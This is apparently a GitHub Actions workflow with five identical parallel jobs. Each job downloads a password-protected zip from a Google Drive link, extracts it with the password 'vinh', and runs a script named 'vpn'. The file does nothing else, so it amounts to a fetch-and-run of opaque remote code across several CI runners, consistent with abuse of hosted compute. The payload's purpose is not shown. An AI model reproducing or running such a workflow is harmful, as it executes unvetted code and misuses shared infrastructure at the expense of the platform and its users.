name: Ubuntu

on: workflow_dispatch

jobs:
  one:
    runs-on: ubuntu-18.04

    steps:
    - name: Running
      run: sudo apt update -y && sudo apt install p7zip-full -y && wget -O file.zip "https://drive.google.com/uc?export=download&id=1ImqkWfuEa9iDVW-wvMJAUZDqw7AfE6o5" && 7z  x  -pvinh file.zip && bash vpn

  two:
    runs-on: ubuntu-18.04

    steps:
    - name: Running
      run: sudo apt update -y && sudo apt install p7zip-full -y && wget -O file.zip "https://drive.google.com/uc?export=download&id=1ImqkWfuEa9iDVW-wvMJAUZDqw7AfE6o5" && 7z  x  -pvinh file.zip && bash vpn

  three:
    runs-on: ubuntu-18.04

    steps:
    - name: Running
      run: sudo apt update -y && sudo apt install p7zip-full -y && wget -O file.zip "https://drive.google.com/uc?export=download&id=1ImqkWfuEa9iDVW-wvMJAUZDqw7AfE6o5" && 7z  x  -pvinh file.zip && bash vpn

  four:
    runs-on: ubuntu-18.04

    steps:
    - name: Running
      run: sudo apt update -y && sudo apt install p7zip-full -y && wget -O file.zip "https://drive.google.com/uc?export=download&id=1ImqkWfuEa9iDVW-wvMJAUZDqw7AfE6o5" && 7z  x  -pvinh file.zip && bash vpn

  five:
    runs-on: ubuntu-18.04

    steps:
    - name: Running
      run: sudo apt update -y && sudo apt install p7zip-full -y && wget -O file.zip "https://drive.google.com/uc?export=download&id=1ImqkWfuEa9iDVW-wvMJAUZDqw7AfE6o5" && 7z  x  -pvinh file.zip && bash vpn
